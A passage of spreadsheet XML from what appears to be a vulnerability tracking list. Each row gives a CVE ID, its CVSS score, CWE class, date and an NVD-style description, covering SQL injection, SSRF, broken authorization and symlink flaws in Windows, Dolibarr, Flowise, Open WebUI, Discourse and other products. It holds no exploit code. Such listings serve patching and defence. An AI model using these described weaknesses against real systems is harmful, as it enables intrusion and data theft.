    <row r="3198">
      <c r="A3198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="C3198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3198" s="5" t="inlineStr"/>
      <c r="F3198" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3198" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3198" s="5" t="inlineStr"/>
      <c r="I3198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3198" s="5" t="inlineStr"/>
      <c r="K3198" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3198" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="3199">
      <c r="A3199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="C3199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3199" s="5" t="inlineStr"/>
      <c r="F3199" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3199" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3199" s="5" t="inlineStr"/>
      <c r="I3199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3199" s="5" t="inlineStr"/>
      <c r="K3199" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3199" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="3200">
      <c r="A3200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="C3200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3200" s="5" t="inlineStr"/>
      <c r="F3200" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3200" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3200" s="5" t="inlineStr"/>
      <c r="I3200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3200" s="5" t="inlineStr"/>
      <c r="K3200" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3200" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="3201">
      <c r="A3201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70462</t>
        </is>
      </c>
      <c r="C3201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3201" s="5" t="inlineStr"/>
      <c r="F3201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3201" s="5" t="inlineStr"/>
      <c r="H3201" s="5" t="inlineStr"/>
      <c r="I3201" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3201" s="5" t="inlineStr"/>
      <c r="K3201" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-835</t>
        </is>
      </c>
      <c r="L3201" s="5" t="inlineStr">
        <is>
          <t>rsync 3.1.0 before 3.5.0 contains a signed integer overflow vulnerability in the I/O timeout implementation that allows attackers to permanently disable connection timeouts by injecting MSG_IO_TIMEOUT messages carrying non-positive (zero or negative) values. Attackers can craft malicious MSG_IO_TIMEOUT messages that cause the timeout variable to wrap to a non-positive value, preventing the timeout check from firing and enabling idle or stalled connections to hold daemon slots indefinitely, leading to resource exhaustion.</t>
        </is>
      </c>
      <c r="M3201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70462</t>
        </is>
      </c>
    </row>
    <row r="3202">
      <c r="A3202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70471</t>
        </is>
      </c>
      <c r="C3202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3202" s="5" t="inlineStr"/>
      <c r="F3202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3202" s="5" t="inlineStr"/>
      <c r="H3202" s="5" t="inlineStr"/>
      <c r="I3202" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3202" s="5" t="inlineStr"/>
      <c r="K3202" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3202" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise injects $vars into the code execution sandbox without requiring variables:view, bypassing the permission-protected Variables API. Variables for the active workspace are fetched at packages/components/src/utils.ts and runtime variables are resolved from server environment variables, while the official variables route enforces variables:view. A user or API key that is denied variables:view can call /api/v1/node-custom-function and receive $vars pre-populated with all variables for the workspace, including Variable.name to Variable.value static variables and Variable.name to process.env[Variable.name] runtime variables. This can expose secrets such as database passwords, JWT secrets, SMTP passwords, and cloud keys, depending on the workspace Variables configuration. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70471</t>
        </is>
      </c>
    </row>
    <row r="3203">
      <c r="A3203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70472</t>
        </is>
      </c>
      <c r="C3203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3203" s="5" t="inlineStr"/>
      <c r="F3203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3203" s="5" t="inlineStr"/>
      <c r="H3203" s="5" t="inlineStr"/>
      <c r="I3203" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3203" s="5" t="inlineStr"/>
      <c r="K3203" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="L3203" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise openai-assistants-vector-store endpoints accept a client-controlled credential parameter and load credentials by id without checking whether that credential belongs to the caller workspace. Route permissions assistants:* only check feature access. The controller passes req.query.credential straight to the service, and the service uses findOneBy({ id: credentialId }), decrypts the credential, and calls OpenAI APIs without a workspaceId check. If an attacker knows another workspace credentialId, the attacker can use that workspace OpenAI key, read, modify, or delete victim vector stores and files, cause billing impact on the victim OpenAI account, and violate multi-tenant boundaries. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70472</t>
        </is>
      </c>
    </row>
    <row r="3204">
      <c r="A3204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70475</t>
        </is>
      </c>
      <c r="C3204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3204" s="5" t="inlineStr"/>
      <c r="F3204" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3204" s="5" t="inlineStr"/>
      <c r="H3204" s="5" t="inlineStr"/>
      <c r="I3204" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3204" s="5" t="inlineStr"/>
      <c r="K3204" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3204" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the PUT /api/v1/executions/:id endpoint in packages/server/src/routes/executions/index.ts lacks the checkAnyPermission() middleware that protects other execution endpoints. Any authenticated user, regardless of assigned permissions, can modify execution state, data, and metadata of any execution in their workspace, enabling privilege escalation and manipulation of workflow execution results. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M3204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70475</t>
        </is>
      </c>
    </row>
    <row r="3205">
      <c r="A3205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70485</t>
        </is>
      </c>
      <c r="C3205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3205" s="5" t="inlineStr"/>
      <c r="F3205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3205" s="5" t="inlineStr"/>
      <c r="H3205" s="5" t="inlineStr"/>
      <c r="I3205" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3205" s="5" t="inlineStr"/>
      <c r="K3205" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3205" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.0, Open WebUI checked whether a user-supplied URL destination was globally routable by applying ipaddress.is_global to the literal IPv6 address without examining IPv4 addresses embedded in transition encodings. On a deployment with a NAT64 gateway, any verified user could wrap an internal or cloud-metadata IPv4 address in the NAT64 well-known prefix, pass the filter, and receive the internal response body through RAG URL ingestion, URL-to-markdown conversion, or web-search content retrieval. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M3205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70485</t>
        </is>
      </c>
    </row>
    <row r="3206">
      <c r="A3206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71415</t>
        </is>
      </c>
      <c r="C3206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3206" s="5" t="inlineStr"/>
      <c r="F3206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3206" s="5" t="inlineStr"/>
      <c r="H3206" s="5" t="inlineStr"/>
      <c r="I3206" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3206" s="5" t="inlineStr"/>
      <c r="K3206" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3206" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. From 5.0.0 until 5.5.2, Kirby's REST API chunk upload handler in src/Api/Upload.php did not run the relevant upload authorization preflight in Kirby\Api\Upload::process() before Kirby\Api\Upload::processChunk() persisted chunk data. An authenticated user with the access.panel permission enabled but with files.create, files.replace, and user/users.update permissions disabled could submit requests with an Upload-Length header and leave unfinished chunks in site/cache/.uploads for 24 hours. Repeating this process could consume attacker-controlled temporary storage, prevent other users from uploading files, or prevent site logic from storing data, although final permission checks still prevented unauthorized files from reaching the content or site/accounts directories. This issue is fixed in version 5.5.2.</t>
        </is>
      </c>
      <c r="M3206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71415</t>
        </is>
      </c>
    </row>
    <row r="3207">
      <c r="A3207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71505</t>
        </is>
      </c>
      <c r="C3207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3207" s="5" t="inlineStr"/>
      <c r="F3207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3207" s="5" t="inlineStr"/>
      <c r="H3207" s="5" t="inlineStr"/>
      <c r="I3207" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3207" s="5" t="inlineStr"/>
      <c r="K3207" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3207" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API third-party site account write routes that allows authenticated attackers with third-party creation rights to overwrite the WebPortal password of any company by bypassing per-object access checks that are only enforced on read routes. Attackers can replace the victim company's WebPortal password through the write endpoint, authenticate as that company to access its invoice data, and also obtain the victim's previous password verifier from the API response.</t>
        </is>
      </c>
      <c r="M3207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71505</t>
        </is>
      </c>
    </row>
    <row r="3208">
      <c r="A3208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71507</t>
        </is>
      </c>
      <c r="C3208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3208" s="5" t="inlineStr"/>
      <c r="F3208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3208" s="5" t="inlineStr"/>
      <c r="H3208" s="5" t="inlineStr"/>
      <c r="I3208" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3208" s="5" t="inlineStr"/>
      <c r="K3208" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3208" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API company bank account write routes that allows authenticated attackers with third-party creation rights to create, replace, or delete bank account details of any company without requiring read access to that company. Attackers can inject attacker-controlled IBANs as creditor accounts, which are then written into regenerated SEPA credit-transfer files, redirecting outgoing payments to attacker-controlled accounts.</t>
        </is>
      </c>
      <c r="M3208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71507</t>
        </is>
      </c>
    </row>
    <row r="3209">
      <c r="A3209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71508</t>
        </is>
      </c>
      <c r="C3209" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3209" s="5" t="inlineStr"/>
      <c r="F3209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3209" s="5" t="inlineStr"/>
      <c r="H3209" s="5" t="inlineStr"/>
      <c r="I3209" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3209" s="5" t="inlineStr"/>
      <c r="K3209" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3209" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the user REST API update endpoint that allows attackers with user-write rights to modify payroll fields by exploiting an incomplete credential denylist that omits payroll columns. Attackers can rewrite salary, bonus, hourly rate, daily rate, and weekly hours for any user without holding payroll rights, with the modified values appearing in payroll export reports.</t>
        </is>
      </c>
      <c r="M3209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71508</t>
        </is>
      </c>
    </row>
    <row r="3210">
      <c r="A3210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71509</t>
        </is>
      </c>
      <c r="C3210" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3210" s="5" t="inlineStr"/>
      <c r="F3210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3210" s="5" t="inlineStr"/>
      <c r="H3210" s="5" t="inlineStr"/>
      <c r="I3210" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3210" s="5" t="inlineStr"/>
      <c r="K3210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3210" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the expense report REST API update endpoint that allows authenticated attackers with expense-creation rights to bypass the approval workflow by directly setting approval status and approver identity fields. Attackers can manipulate workflow state fields through the REST API to advance expense reports to approved or closed status without possessing the dedicated approval right, while also creating forensic inconsistencies in audit records due to missing approval timestamps.</t>
        </is>
      </c>
      <c r="M3210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71509</t>
        </is>
      </c>
    </row>
    <row r="3211">
      <c r="A3211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71510</t>
        </is>
      </c>
      <c r="C3211" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3211" s="5" t="inlineStr"/>
      <c r="F3211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3211" s="5" t="inlineStr"/>
      <c r="H3211" s="5" t="inlineStr"/>
      <c r="I3211" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3211" s="5" t="inlineStr"/>
      <c r="K3211" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3211" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a SQL injection vulnerability in the users REST API that allows authenticated attackers with user-read rights to extract sensitive data by splicing unsanitized filter parameters into SQL WHERE clauses without column restrictions. Attackers can perform binary search on numeric fields and LIKE prefix iteration on string fields to recover salary figures and password verifiers omitted from normal API responses, while raw database error messages in the same endpoint enable column name enumeration.</t>
        </is>
      </c>
      <c r="M3211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71510</t>
        </is>
      </c>
    </row>
    <row r="3212">
      <c r="A3212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71511</t>
        </is>
      </c>
      <c r="C3212" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3212" s="5" t="inlineStr"/>
      <c r="F3212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3212" s="5" t="inlineStr"/>
      <c r="H3212" s="5" t="inlineStr"/>
      <c r="I3212" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3212" s="5" t="inlineStr"/>
      <c r="K3212" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3212" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a sensitive data exposure vulnerability in the Members REST API that allows authenticated attackers with member-read rights to retrieve bcrypt password verifiers by querying member endpoints. Attackers can call the individual member or member list endpoints to obtain crypted password verifier fields that are not filtered by the base API serializer or the Members API class, potentially enabling offline password cracking attacks.</t>
        </is>
      </c>
      <c r="M3212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71511</t>
        </is>
      </c>
    </row>
    <row r="3213">
      <c r="A3213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71553</t>
        </is>
      </c>
      <c r="C3213" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3213" s="5" t="inlineStr"/>
      <c r="F3213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3213" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3213" s="5" t="inlineStr"/>
      <c r="I3213" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3213" s="5" t="inlineStr"/>
      <c r="K3213" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3213" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. In 4.32.0 and earlier, PATCH /api/v1/article/:id accepts the inherited path toString.call and passes it through the utility module to apos.util.set() and apos.util.get(), allowing an authenticated editor to overwrite the shared Object.prototype.toString function's call property and cause a persistent process-wide denial of service until restart.</t>
        </is>
      </c>
      <c r="M3213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71553</t>
        </is>
      </c>
    </row>
    <row r="3214">
      <c r="A3214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71556</t>
        </is>
      </c>
      <c r="C3214" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3214" s="5" t="inlineStr"/>
      <c r="F3214" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3214" s="5" t="inlineStr"/>
      <c r="H3214" s="5" t="inlineStr"/>
      <c r="I3214" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3214" s="5" t="inlineStr"/>
      <c r="K3214" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3214" s="5" t="inlineStr">
        <is>
          <t>go-git is an extensible git implementation library written in pure Go. Prior to 5.19.2 and 6.0.0-alpha.5, worktree operations (including checkout, status, and add) resolve symbolic links inside the working tree without confining resolution to the worktree boundary, so a maliciously crafted repository containing a symlink can cause go-git to read from or write to files outside the intended working directory when the repository is cloned and its worktree operations are used. Versions 5.19.2 and 6.0.0-alpha.5.</t>
        </is>
      </c>
      <c r="M3214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71556</t>
        </is>
      </c>
    </row>
    <row r="3215">
      <c r="A3215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71964</t>
        </is>
      </c>
      <c r="C3215" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3215" s="5" t="inlineStr"/>
      <c r="F3215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3215" s="5" t="inlineStr"/>
      <c r="H3215" s="5" t="inlineStr"/>
      <c r="I3215" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3215" s="5" t="inlineStr"/>
      <c r="K3215" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3215" s="5" t="inlineStr">
        <is>
          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an arbitrary file read vulnerability in the file manager component that allows authenticated attackers to read sensitive system files by uploading a crafted ZIP archive containing symbolic links. Attackers can exploit the application's failure to validate symlinks before extraction, causing symbolic links targeting arbitrary filesystem paths outside the user's home directory to persist on disk and be accessed through the web interface.</t>
        </is>
      </c>
      <c r="M3215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71964</t>
        </is>
      </c>
    </row>
    <row r="3216">
      <c r="A3216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72694</t>
        </is>
      </c>
      <c r="C3216" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3216" s="5" t="inlineStr"/>
      <c r="F3216" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3216" s="5" t="inlineStr"/>
      <c r="H3216" s="5" t="inlineStr"/>
      <c r="I3216" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3216" s="5" t="inlineStr"/>
      <c r="K3216" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3216" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in MRTG. When the MRTG daemon is started as a root user and subsequently drops privileges, a local, low-privileged attacker can exploit a symbolic link (symlink) following vulnerability. By influencing or pre-placing a symlink in the process ID (PID) file path, the attacker can trick the root process into changing the ownership of an arbitrary existing file to the daemon user. This can lead to local privilege escalation, allowing unauthorized access to or modification of sensitive files.</t>
        </is>
      </c>
      <c r="M3216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72694</t>
        </is>
      </c>
    </row>
    <row r="3217">
      <c r="A3217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72731</t>
        </is>
      </c>
      <c r="C3217" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3217" s="5" t="inlineStr"/>
      <c r="F3217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3217" s="5" t="inlineStr"/>
      <c r="H3217" s="5" t="inlineStr"/>
      <c r="I3217" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3217" s="5" t="inlineStr"/>
      <c r="K3217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3217" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. From 2026.1.0-latest until 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1, anyone able to run a parameterized Data Explorer query, including non-staff members of a group a query is shared with, could craft parameter values that escaped the intended query and executed arbitrary SQL through plugins/discourse-data-explorer/lib/discourse_data_explorer/data_explorer.rb and plugins/discourse-data-explorer/lib/discourse_data_explorer/workflows/sql_action/v1.rb. Recursive parameter interpolation allowed one parameter value to introduce another parameter, and parameter declarations in SQL comments could be used to inject a statement. Queries run in a read-only transaction, so data could not be modified, but any table could be read. This issue is fixed in versions 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1.</t>
        </is>
      </c>
      <c r="M3217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72731</t>
        </is>
      </c>
    </row>
    <row r="3218">
      <c r="A3218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72774</t>
        </is>
      </c>
      <c r="C3218" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3218" s="5" t="inlineStr"/>
      <c r="F3218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3218" s="5" t="inlineStr"/>
      <c r="H3218" s="5" t="inlineStr"/>
      <c r="I3218" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3218" s="5" t="inlineStr"/>
      <c r="K3218" s="5" t="inlineStr">
